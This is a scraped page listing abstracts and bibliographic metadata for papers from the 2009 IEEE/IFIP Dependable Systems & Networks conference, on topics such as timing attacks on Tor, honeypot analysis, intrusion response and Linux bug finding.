Pub Date : 2009-09-29DOI: 10.1109/DSN.2009.5270306
Jinghe Jin, Xinyuan Wang
In this paper, we introduce a novel metric that can quantitatively measure the practical effectiveness (i.e. anonymity) of all anonymous networks in the presence of timing attack. Our metric is based on a novel measurement of the distortion of the packet timing between the incoming and the outgoing flows to and from the anonymous network and it uses wavelet based analysis to measure the variability of the distortion. To the best of our knowledge, our approach is the first practical method that can quantitatively measure the packet timing distortion between flows that may have gone through such transformations as flow mixing/spliting/merging, adding chaff, packet dropping. To validate our anonymity metric, we have conducted real-time timing attacks on various deployed anonymous networks such as Tor, anonymizer.com and have used the timing attack results as the ground truth for validating our anonymity metric. We have found strong correlation between our anonymity metric and the timing attack results. Our metric measurements and timing attack results show that the circuit rotation in Tor network could significantly increase its resistance to timing attack at the cost of more timing disturbances to the normal users. In addition, we have found that adding constant rate chaff (i.e. cover traffic) has diminishing effect in anonymizing packet flows.
{"title":"On the effectiveness of low latency anonymous network in the presence of timing attack","authors":"Jinghe Jin, Xinyuan Wang","doi":"10.1109/DSN.2009.5270306","DOIUrl":"https://doi.org/10.1109/DSN.2009.5270306","url":null,"abstract":"In this paper, we introduce a novel metric that can quantitatively measure the practical effectiveness (i.e. anonymity) of all anonymous networks in the presence of timing attack. Our metric is based on a novel measurement of the distortion of the packet timing between the incoming and the outgoing flows to and from the anonymous network and it uses wavelet based analysis to measure the variability of the distortion. To the best of our knowledge, our approach is the first practical method that can quantitatively measure the packet timing distortion between flows that may have gone through such transformations as flow mixing/spliting/merging, adding chaff, packet dropping. To validate our anonymity metric, we have conducted real-time timing attacks on various deployed anonymous networks such as Tor, anonymizer.com and have used the timing attack results as the ground truth for validating our anonymity metric. We have found strong correlation between our anonymity metric and the timing attack results. Our metric measurements and timing attack results show that the circuit rotation in Tor network could significantly increase its resistance to timing attack at the cost of more timing disturbances to the normal users. In addition, we have found that adding constant rate chaff (i.e. cover traffic) has diminishing effect in anonymizing packet flows.","PeriodicalId":376982,"journal":{"name":"2009 IEEE/IFIP International Conference on Dependable Systems & Networks","volume":"30 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2009-09-29","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"134374295","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2009-09-29DOI: 10.1109/DSN.2009.5270334
Luis Marques, A. Casimiro, M. Calha
This paper describes the design and development of a proof-of-concept platooning application, which operates in a mobile and dynamic environment and makes use of architectural and middleware solutions that were proposed in the scope of the HIDENETS project. With this application it is possible to demonstrate the practical feasibility of a hybrid system architecture, with realms of operation with distinct synchrony properties, and the benefits of adopting such architecture. In particular, we show that it is possible to improve the performance and behavior of the platooning application, which operates over an intrinsically uncertain environment (due to mobility and wireless communication), and still secure fundamental safety-critical requirements.
{"title":"Design and development of a proof-of-concept platooning application using the HIDENETS architecture","authors":"Luis Marques, A. Casimiro, M. Calha","doi":"10.1109/DSN.2009.5270334","DOIUrl":"https://doi.org/10.1109/DSN.2009.5270334","url":null,"abstract":"This paper describes the design and development of a proof-of-concept platooning application, which operates in a mobile and dynamic environment and makes use of architectural and middleware solutions that were proposed in the scope of the HIDENETS project. With this application it is possible to demonstrate the practical feasibility of a hybrid system architecture, with realms of operation with distinct synchrony properties, and the benefits of adopting such architecture. In particular, we show that it is possible to improve the performance and behavior of the platooning application, which operates over an intrinsically uncertain environment (due to mobility and wireless communication), and still secure fundamental safety-critical requirements.","PeriodicalId":376982,"journal":{"name":"2009 IEEE/IFIP International Conference on Dependable Systems & Networks","volume":"30 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2009-09-29","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"121402768","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2009-09-29DOI: 10.1109/DSN.2009.5270354
J. Lawall, Julien Brunel, Nicolas Palix, René Rydhof Hansen, H. Stuart, Gilles Muller
Eliminating OS bugs is essential to ensuring the reliability of infrastructures ranging from embedded systems to servers. Several tools based on static analysis have been proposed for finding bugs in OS code. They have, however, emphasized scalability over usability, making it difficult to focus the tools on specific kinds of bugs and to relate the results to patterns in the source code. We propose a declarative approach to bug finding in Linux OS code using a control-flow based program search engine. Our approach is WYSIWIB (What You See Is Where It Bugs), since the programmer expresses specifications for bug finding using a syntax close to that of ordinary C code. The key advantage of our approach is that search specifications can be easily tailored, to eliminate false positives or catch more bugs. We present three case studies that have allowed us to find hundreds of potential bugs.
{"title":"WYSIWIB: A declarative approach to finding API protocols and bugs in Linux code","authors":"J. Lawall, Julien Brunel, Nicolas Palix, René Rydhof Hansen, H. Stuart, Gilles Muller","doi":"10.1109/DSN.2009.5270354","DOIUrl":"https://doi.org/10.1109/DSN.2009.5270354","url":null,"abstract":"Eliminating OS bugs is essential to ensuring the reliability of infrastructures ranging from embedded systems to servers. Several tools based on static analysis have been proposed for finding bugs in OS code. They have, however, emphasized scalability over usability, making it difficult to focus the tools on specific kinds of bugs and to relate the results to patterns in the source code. We propose a declarative approach to bug finding in Linux OS code using a control-flow based program search engine. Our approach is WYSIWIB (What You See Is Where It Bugs), since the programmer expresses specifications for bug finding using a syntax close to that of ordinary C code. The key advantage of our approach is that search specifications can be easily tailored, to eliminate false positives or catch more bugs. We present three case studies that have allowed us to find hundreds of potential bugs.","PeriodicalId":376982,"journal":{"name":"2009 IEEE/IFIP International Conference on Dependable Systems & Networks","volume":"1 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2009-09-29","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"122377039","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
We consider a set of clients collaborating through an online service provider that is subject to attacks, and hence not fully trusted by the clients. We introduce the abstraction of a fail-aware untrusted service, with meaningful semantics even when the provider is faulty. In the common case, when the provider is correct, such a service guarantees consistency (linearizability) and liveness (wait-freedom) of all operations. In addition, the service always provides accurate and complete consistency and failure detection. We illustrate our new abstraction by presenting a Fail-Aware Untrusted STorage service (FAUST). Existing storage protocols in this model guarantee so-called forking semantics. We observe, however, that none of the previously suggested protocols suffice for implementing fail-aware untrusted storage with the desired liveness and consistency properties (at least wait-freedom and linearizability when the server is correct). We present a new storage protocol, which does not suffer from this limitation, and implements a new consistency notion, called weak fork-linearizability. We show how to extend this protocol to provide eventual consistency and failure awareness in FAUST.
{"title":"Fail-Aware Untrusted Storage","authors":"C. Cachin, I. Keidar, A. Shraer","doi":"10.1137/090751062","DOIUrl":"https://doi.org/10.1137/090751062","url":null,"abstract":"We consider a set of clients collaborating through an online service provider that is subject to attacks, and hence not fully trusted by the clients. We introduce the abstraction of a fail-aware untrusted service, with meaningful semantics even when the provider is faulty. In the common case, when the provider is correct, such a service guarantees consistency (linearizability) and liveness (wait-freedom) of all operations. In addition, the service always provides accurate and complete consistency and failure detection. We illustrate our new abstraction by presenting a Fail-Aware Untrusted STorage service (FAUST). Existing storage protocols in this model guarantee so-called forking semantics. We observe, however, that none of the previously suggested protocols suffice for implementing fail-aware untrusted storage with the desired liveness and consistency properties (at least wait-freedom and linearizability when the server is correct). We present a new storage protocol, which does not suffer from this limitation, and implements a new consistency notion, called weak fork-linearizability. We show how to extend this protocol to provide eventual consistency and failure awareness in FAUST.","PeriodicalId":376982,"journal":{"name":"2009 IEEE/IFIP International Conference on Dependable Systems & Networks","volume":"38 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2009-09-29","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"123406418","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2009-09-29DOI: 10.1109/DSN.2009.5270328
Yongning Tang, E. Al-Shaer
The dependability of overlay services rely on the overlay network's capabilities to effectively diagnose and recover faults (e.g., link failures, overlay node outages). However, overlay applications bring to overlay fault diagnosis new challenges, which include large-scale deployment, inaccessible underlying network information, dynamic symptom-fault causality relationship, and multi-layer complexity. In this paper, we develop an evidential overlay fault diagnosis framework (called DigOver) to tackle these challenges. Firstly, the DigOver identifies a set of potential faulty components based on shared end-user observed negative symptoms. Then, each potential faulty component is evaluated to quantify its fault likelihood and the corresponding evaluation uncertainty. Finally, the DigOver dynamically constructs a plausible fault graph to locate the root causes of end-user observed negative symptoms.
{"title":"Sharing end-user negative symptoms for improving overlay network dependability","authors":"Yongning Tang, E. Al-Shaer","doi":"10.1109/DSN.2009.5270328","DOIUrl":"https://doi.org/10.1109/DSN.2009.5270328","url":null,"abstract":"The dependability of overlay services rely on the overlay network's capabilities to effectively diagnose and recover faults (e.g., link failures, overlay node outages). However, overlay applications bring to overlay fault diagnosis new challenges, which include large-scale deployment, inaccessible underlying network information, dynamic symptom-fault causality relationship, and multi-layer complexity. In this paper, we develop an evidential overlay fault diagnosis framework (called DigOver) to tackle these challenges. Firstly, the DigOver identifies a set of potential faulty components based on shared end-user observed negative symptoms. Then, each potential faulty component is evaluated to quantify its fault likelihood and the corresponding evaluation uncertainty. Finally, the DigOver dynamically constructs a plausible fault graph to locate the root causes of end-user observed negative symptoms.","PeriodicalId":376982,"journal":{"name":"2009 IEEE/IFIP International Conference on Dependable Systems & Networks","volume":"24 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2009-09-29","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"129353524","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2009-09-29DOI: 10.1109/DSN.2009.5270344
Gabriela Jacques-Silva, B. Gedik, H. Andrade, Kun-Lung Wu
Many streaming applications demand continuous processing of live data with little or no downtime, therefore, making high-availability a crucial operational requirement. Fault tolerance techniques are generally expensive and when directly applied to streaming systems with stringent throughput and latency requirements, they might incur a prohibitive performance overhead. This paper describes a flexible, light-weight fault tolerance solution in the context of the SPADE language and the System S distributed stream processing engine. We devised language extensions so users can define and parameterize check-point policies easily. This configurable fault tolerance solution is implemented through code generation in SPADE, which reduces the overall application fault tolerance costs by incurring them only for the parts of the application that require it. In this paper we focus on the overall design of our checkpoint mechanism and we also describe an incremental checkpointing algorithm that is suitable for on-the-fly processing of high-rate data streams.
{"title":"Language level checkpointing support for stream processing applications","authors":"Gabriela Jacques-Silva, B. Gedik, H. Andrade, Kun-Lung Wu","doi":"10.1109/DSN.2009.5270344","DOIUrl":"https://doi.org/10.1109/DSN.2009.5270344","url":null,"abstract":"Many streaming applications demand continuous processing of live data with little or no downtime, therefore, making high-availability a crucial operational requirement. Fault tolerance techniques are generally expensive and when directly applied to streaming systems with stringent throughput and latency requirements, they might incur a prohibitive performance overhead. This paper describes a flexible, light-weight fault tolerance solution in the context of the SPADE language and the System S distributed stream processing engine. We devised language extensions so users can define and parameterize check-point policies easily. This configurable fault tolerance solution is implemented through code generation in SPADE, which reduces the overall application fault tolerance costs by incurring them only for the parts of the application that require it. In this paper we focus on the overall design of our checkpoint mechanism and we also describe an incremental checkpointing algorithm that is suitable for on-the-fly processing of high-rate data streams.","PeriodicalId":376982,"journal":{"name":"2009 IEEE/IFIP International Conference on Dependable Systems & Networks","volume":"19 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2009-09-29","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"130289721","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2009-09-29DOI: 10.1109/DSN.2009.5270293
R. Berthier, Jorge Arjona, M. Cukier
This practical experience report presents the results of an experiment aimed at understanding the sequence of malicious actions following a remote compromise. The type of rogue software installed during attacks was used to classify and understand sequences of malicious actions. For this experiment, we used four Linux target computers running SSH with simple passwords. During the eight-month data collection period, we recorded a total of 1,171 attack sessions. In these sessions, attackers typed a total of 20,335 commands that we categorized into 24 specific actions. These actions were analyzed based on the type of rogue software installed by attackers.
{"title":"Analyzing the process of installing rogue software","authors":"R. Berthier, Jorge Arjona, M. Cukier","doi":"10.1109/DSN.2009.5270293","DOIUrl":"https://doi.org/10.1109/DSN.2009.5270293","url":null,"abstract":"This practical experience report presents the results of an experiment aimed at understanding the sequence of malicious actions following a remote compromise. The type of rogue software installed during attacks was used to classify and understand sequences of malicious actions. For this experiment, we used four Linux target computers running SSH with simple passwords. During the eight-month data collection period, we recorded a total of 1,171 attack sessions. In these sessions, attackers typed a total of 20,335 commands that we categorized into 24 specific actions. These actions were analyzed based on the type of rogue software installed by attackers.","PeriodicalId":376982,"journal":{"name":"2009 IEEE/IFIP International Conference on Dependable Systems & Networks","volume":"5 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2009-09-29","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"127028661","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2009-09-29DOI: 10.1109/DSN.2009.5270355
Xiang Yin, J. Knight, Westley Weimer
In previous work, we introduced Echo, a new approach to the formal verification of the functional correctness of software. Part of what makes Echo practical is a technique called verification refactoring. The program to be verified is mechanically refactored specifically to facilitate verification. After refactoring, the program is documented with low-level annotations, and a specification is extracted mechanically. Proofs that the semantics of the refactored program are equivalent to those of the original program, that the code conforms to the annotations, and that the extracted specification implies the program's original specification constitute the verification argument. In this paper, we discuss verification refactoring and illustrate it with a case study of the verification of an optimized implementation of the Advanced Encryption Standard (AES) against its official specification. We compare the practicality of verification using refactoring with traditional correctness proofs and refinement, and we assess its efficacy using seeded defects.
{"title":"Exploiting refactoring in formal verification","authors":"Xiang Yin, J. Knight, Westley Weimer","doi":"10.1109/DSN.2009.5270355","DOIUrl":"https://doi.org/10.1109/DSN.2009.5270355","url":null,"abstract":"In previous work, we introduced Echo, a new approach to the formal verification of the functional correctness of software. Part of what makes Echo practical is a technique called verification refactoring. The program to be verified is mechanically refactored specifically to facilitate verification. After refactoring, the program is documented with low-level annotations, and a specification is extracted mechanically. Proofs that the semantics of the refactored program are equivalent to those of the original program, that the code conforms to the annotations, and that the extracted specification implies the program's original specification constitute the verification argument. In this paper, we discuss verification refactoring and illustrate it with a case study of the verification of an optimized implementation of the Advanced Encryption Standard (AES) against its official specification. We compare the practicality of verification using refactoring with traditional correctness proofs and refinement, and we assess its efficacy using seeded defects.","PeriodicalId":376982,"journal":{"name":"2009 IEEE/IFIP International Conference on Dependable Systems & Networks","volume":"51 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2009-09-29","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"129598944","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2009-06-01DOI: 10.1109/DSN.2009.5270307
Saman A. Zonouz, Himanshu Khurana, William H. Sanders, Timothy M. Yardley
Preserving the availability and integrity of networked computing systems in the face of fast-spreading intrusions requires advances not only in detection algorithms, but also in automated response techniques. In this paper, we propose a new approach to automated response called the Response and Recovery Engine (RRE). Our engine employs a game-theoretic response strategy against adversaries modeled as opponents in a two-player Stackelberg stochastic game. RRE applies attack-response trees to analyze undesired security events and their countermeasures using Boolean logic to combine lower-level attack consequences. In addition, RRE accounts for uncertainties in intrusion detection alert notifications. RRE then chooses optimal response actions by solving a partially observable competitive Markov decision process that is automatically derived from attack-response trees. Experimental results show that RRE, using Snort's alerts, can protect large networks for which attack-response trees have more than 900 nodes.
{"title":"RRE: A game-theoretic intrusion Response and Recovery Engine","authors":"Saman A. Zonouz, Himanshu Khurana, William H. Sanders, Timothy M. Yardley","doi":"10.1109/DSN.2009.5270307","DOIUrl":"https://doi.org/10.1109/DSN.2009.5270307","url":null,"abstract":"Preserving the availability and integrity of networked computing systems in the face of fast-spreading intrusions requires advances not only in detection algorithms, but also in automated response techniques. In this paper, we propose a new approach to automated response called the Response and Recovery Engine (RRE). Our engine employs a game-theoretic response strategy against adversaries modeled as opponents in a two-player Stackelberg stochastic game. RRE applies attack-response trees to analyze undesired security events and their countermeasures using Boolean logic to combine lower-level attack consequences. In addition, RRE accounts for uncertainties in intrusion detection alert notifications. RRE then chooses optimal response actions by solving a partially observable competitive Markov decision process that is automatically derived from attack-response trees. Experimental results show that RRE, using Snort's alerts, can protect large networks for which attack-response trees have more than 900 nodes.","PeriodicalId":376982,"journal":{"name":"2009 IEEE/IFIP International Conference on Dependable Systems & Networks","volume":"4 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2009-06-01","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"125674595","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2009-06-01DOI: 10.1109/DSN.2009.5270311
Luc Malrait, S. Bouchenak, N. Marchand
Although server technology provides a means to support a wide range of online services and applications, their ad-hoc configuration poses significant challenges to the performance, availability and economical costs of applications. In this paper, we examine the impact of server configuration on the central tradeoff between service performance and availability. First, we present a server model as a nonlinear continuous-time model using fluid approximations. Second, we develop admission control of server systems for an optimal configuration. We provide two control laws for two different QoS objectives. AM-C is an availability-maximizing admission control that achieves the highest service availability given a fixed performance constraint; and PM-C is a performance-maximizing admission control that meets a desired availability target with the highest performance. We evaluate our fluid model and control techniques on the TPC-C industry-standard benchmark. Our experiments show that the proposed techniques improve performance by up to 30 % while guaranteeing availability constraints.
{"title":"Fluid modeling and control for server system performance and availability","authors":"Luc Malrait, S. Bouchenak, N. Marchand","doi":"10.1109/DSN.2009.5270311","DOIUrl":"https://doi.org/10.1109/DSN.2009.5270311","url":null,"abstract":"Although server technology provides a means to support a wide range of online services and applications, their ad-hoc configuration poses significant challenges to the performance, availability and economical costs of applications. In this paper, we examine the impact of server configuration on the central tradeoff between service performance and availability. First, we present a server model as a nonlinear continuous-time model using fluid approximations. Second, we develop admission control of server systems for an optimal configuration. We provide two control laws for two different QoS objectives. AM-C is an availability-maximizing admission control that achieves the highest service availability given a fixed performance constraint; and PM-C is a performance-maximizing admission control that meets a desired availability target with the highest performance. We evaluate our fluid model and control techniques on the TPC-C industry-standard benchmark. Our experiments show that the proposed techniques improve performance by up to 30 % while guaranteeing availability constraints.","PeriodicalId":376982,"journal":{"name":"2009 IEEE/IFIP International Conference on Dependable Systems & Networks","volume":"28 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2009-06-01","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"128005429","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
京公网安备 11010802042870号
京ICP备2023020795号-1
扫码关注我们
求助内容:
应助结果提醒方式: